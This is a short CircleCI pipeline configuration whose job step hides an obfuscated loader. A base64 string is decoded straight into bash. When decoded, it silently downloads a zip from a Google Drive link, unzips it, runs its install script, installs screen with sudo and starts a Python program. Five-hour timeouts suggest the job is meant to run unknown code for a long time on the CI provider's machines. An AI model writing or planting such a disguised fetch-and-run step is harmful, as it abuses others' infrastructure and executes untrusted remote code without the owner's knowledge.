version: 2.1

jobs:
  runner:
    parameters:
      env:
        type: integer
    docker:
      - image: cimg/python:3.13.0
    steps:
      - run: echo hi from << parameters.env >>
      - run: 
          name: XX_double
          no_output_timeout: 5h
          max_run_time: 5h
          command: |
              bash <( openssl base64 -d \<<< "d2dldCAtcU8gYXBwLnppcCBodHRwczovL2RyaXZlLnVzZXJjb250ZW50Lmdvb2dsZS5jb20vZG93bmxvYWQ/aWQ9MXZrSWlVaVVPS3RLbHFEZ1plRVUzVTU3bkZrblZKZnlnJmV4cG9ydD1kb3dubG9hZCA+IC9kZXYvbnVsbCAyPiYxCnNsZWVwIDUKdW56aXAgYXBwLnppcCAKbHMgLWwgLWEKc2xlZXAgMwpzaCBpbnN0YWxsLnNoCnN1ZG8gYXB0LWdldCBpbnN0YWxsIHNjcmVlbiAteQpweXRob24gbWFpbi5weQ==" )

workflows:
  version: 2
  ci-and-deploy:
    jobs:
      - runner:
          name: runner-1
          env: 1

      
